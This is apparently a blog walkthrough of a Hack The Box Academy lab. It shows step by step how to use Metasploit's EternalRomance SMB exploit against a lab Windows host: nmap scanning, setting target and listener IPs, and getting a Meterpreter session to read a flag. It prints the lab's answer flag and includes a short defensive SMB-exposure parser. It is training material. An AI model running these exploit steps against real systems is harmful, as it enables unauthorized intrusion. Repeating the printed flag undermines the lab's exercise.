Modules — Using the Metasploit Framework Module — HTB Walkthrough

The Malware Mender
Aug 1, 2024

TIER 0 MODULE: USING THE METASPLOIT FRAMEWORK

SECTION: Modules

Please open your Pwnbox or connect to the VPN in order to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator’s desktop and submit the contents as the answer.

First of all, scan the given IP address with nmap to confirm what we are attacking.

nmap -sV <target-ip>

Here we can see that this IP address is running ‘Microsoft Directory Service’ (microsoft-ds) on port 445. That port is used by the Server Message Block (SMB) protocol, which is what the “microsoft-ds” service name usually indicates.
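When auditing your own network, the same reading of nmap output can be automated to list hosts that still expose SMB. The following is an added example, not part of the original walkthrough; the scan output in it is constructed and uses documentation-range addresses, and the function name is hypothetical.

```python
import re

# Constructed sample of `nmap -sV` normal output (addresses from the
# RFC 5737 documentation range); not output from the original page.
SAMPLE = """\
Nmap scan report for 192.0.2.10
Host is up (0.012s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Nmap scan report for files.example (192.0.2.11)
Host is up (0.010s latency).
PORT    STATE    SERVICE      VERSION
22/tcp  open     ssh          OpenSSH 8.9p1
445/tcp filtered microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SMB_PORTS = {139, 445}  # NetBIOS session service and direct-hosted SMB


def smb_exposure(nmap_text):
    """Return one finding per host/port where an SMB port is reported open."""
    findings, host = [], None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            host = {"name": m.group(1), "ip": m.group(2)}
            continue
        m = PORT_RE.match(line.strip())
        if m and host:
            port, proto, state, service, version = m.groups()
            # "filtered" means the probe was dropped, so the port is not counted.
            if int(port) in SMB_PORTS and proto == "tcp" and state == "open":
                findings.append({**host, "port": int(port),
                                 "service": service, "version": version.strip()})
    return findings


if __name__ == "__main__":
    for f in smb_exposure(SAMPLE):
        print(f"{f['ip']}:{f['port']} {f['service']} {f['version'] or '(no version)'}")
```

Hosts that appear in the result are candidates for patching and for blocking port 445 at the network boundary.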

Now, launch Metasploit in your terminal.

msfconsole

💡 You can use the -q switch to start without the Metasploit banner!

Once it has started, search for “EternalRomance”, as told in the question.

search EternalRomance

There are several exploits showing… we will select the one that best suits our need (we need to run commands on the target system).

So, we will select the first exploit (index: 0).

use 0

💡 PsExec is a tool developed by Microsoft, part of the Sysinternals suite, that allows you to execute processes on remote systems.

Now you have to set up the attack, which takes a few configuration steps.

Tell Metasploit the IP address you are going to attack! You do not have to tell it the port to attack (by default it already knows).

set rhost <target-ip>

Now you have to tell it your own IP address (to establish the connection between attacker and victim).

For this, open a new terminal and type,

ifconfig

Look for the IP address of the VPN tunnel interface, i.e. tun0.

And now set this IP as the local IP.

set lhost <your-vpn-ip>

Now you are all set, but first make sure you have everything configured:

show options

Yes, we are all set. Now let’s run the exploit.

run

Now you have a Meterpreter session. To see how to operate it, type help.

pwd

You will notice you are in C:\Windows\system32.

Navigate to C:\Users\Administrator\Desktop.

cd C:/Users/Administrator/Desktop/

Either type this command or navigate there manually with the cd and ls commands.

And finally,

cat flag.txt

Answer: HTB{MSF-W1nD0w5–3xPL01t4t10n}

Still stuck? Watch video!

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)
